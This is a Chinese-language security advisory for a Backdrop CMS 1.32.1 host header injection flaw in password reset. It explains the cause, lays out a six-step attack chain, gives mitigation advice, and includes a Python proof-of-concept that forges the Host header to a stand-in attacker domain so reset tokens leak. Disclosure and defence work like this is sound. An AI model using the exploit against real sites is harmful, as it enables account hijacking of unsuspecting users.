CVE-2025-63828 Backdrop CMS Host头注入漏洞导致钓鱼和会话劫持

漏洞信息

漏洞编号

CVE-2025-63828

漏洞类型

Host Header Injection

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Backdrop CMS 1.32.1

漏洞概述

CVE-2025-63828是Backdrop CMS 1.32.1版本中的一个中等严重性安全漏洞，属于Host Header Injection（主机头注入）类型。该漏洞存在于密码重置功能中，允许未经认证的攻击者通过操纵HTTP请求中的Host头字段，将合法的密码重置链接重定向到恶意域名。由于密码重置链接通常包含敏感的身份验证令牌，攻击者可以利用此漏洞进行钓鱼攻击，窃取用户的密码重置令牌，进而劫持用户账户。此外，攻击者还可能通过cookie注入的方式实施会话劫持，冒充合法用户操作网站。该漏洞的CVSS评分为6.1，属于中等严重程度，需要用户交互（点击钓鱼链接）才能成功利用。

技术细节

Host Header Injection漏洞的核心原理是Web应用程序信任并使用HTTP请求中的Host头字段来生成绝对URL。在Backdrop CMS 1.32.1的密码重置功能中，系统使用$_SERVER['HTTP_HOST']变量来构建密码重置邮件中的链接。攻击者可以通过在HTTP请求中注入恶意的Host头值（如 attacker.com），使得生成的密码重置链接指向攻击者控制的域名。当受害者收到并点击这样的钓鱼链接时，其密码重置令牌会被发送到攻击者的服务器。由于密码重置令牌具有一次性使用的特性，攻击者获得令牌后即可重置用户密码并接管账户。此外，如果应用程序将Host头值未经验证地存储或反射在响应中，还可能导致XSS等二次攻击。防御此类漏洞需要在服务器或应用层面严格验证Host头，只允许预定义的域名列表。

攻击链分析

STEP 1

步骤1

攻击者注册并托管钓鱼服务器，准备接收受害者的密码重置令牌

STEP 2

步骤2

攻击者向目标Backdrop CMS的密码重置端点(/user/password)发送POST请求，在HTTP请求头中注入恶意的Host字段值指向钓鱼域名

STEP 3

步骤3

Backdrop CMS未验证Host头，直接使用HTTP_HOST变量生成密码重置链接，导致生成的链接指向攻击者控制的域名

STEP 4

步骤4

受害者收到伪装成系统邮件的密码重置邮件，邮件中的链接指向攻击者的钓鱼网站

STEP 5

步骤5

受害者点击钓鱼链接访问攻击者的服务器，此时密码重置令牌被发送到攻击者手中

STEP 6

步骤6

攻击者使用获取的令牌在合法网站上完成密码重置，成功劫持受害者账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # CVE-2025-63828 PoC - Host Header Injection in Backdrop CMS 1.32.1 # Target: Backdrop CMS password reset functionality # Attack: Manipulate Host header to redirect password reset to malicious domain TARGET_URL = "http://target-backdrop-cms.com" MALICIOUS_DOMAIN = "attacker-controlled-domain.com" def exploit_host_header_injection(): """ Exploit Host Header Injection in password reset functionality This causes the password reset email to contain a link to the attacker's domain """ # Step 1: Request password reset with manipulated Host header reset_endpoint = f"{TARGET_URL}/user/password" headers = { "Host": MALICIOUS_DOMAIN, "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } data = { "name": "[email protected]" # Target victim email } response = requests.post(reset_endpoint, headers=headers, data=data) print(f"[*] Sent password reset request with malicious Host header: {MALICIOUS_DOMAIN}") print(f"[*] Response Status: {response.status_code}") # Step 2: If successful, victim's email will contain a reset link pointing to attacker domain # The link format will be: http://attacker-controlled-domain.com/user/password/reset/TOKEN print("[*] If successful, victim will receive email with malicious password reset link") print("[*] Attacker can then capture the reset token and hijack the account") if __name__ == "__main__": exploit_host_header_injection()

影响范围

Backdrop CMS 1.32.1

防御指南

临时缓解措施

临时缓解措施：在Web服务器（如Nginx、Apache）配置中显式设置server_name并验证Host头，拒绝Host头与配置不匹配的请求。在Nginx中可以使用if语句检查Host头值，在Apache中可以使用RewriteCond条件进行验证。同时考虑在密码重置流程中添加额外的安全检查，如要求用户回答安全问题或使用双因素认证。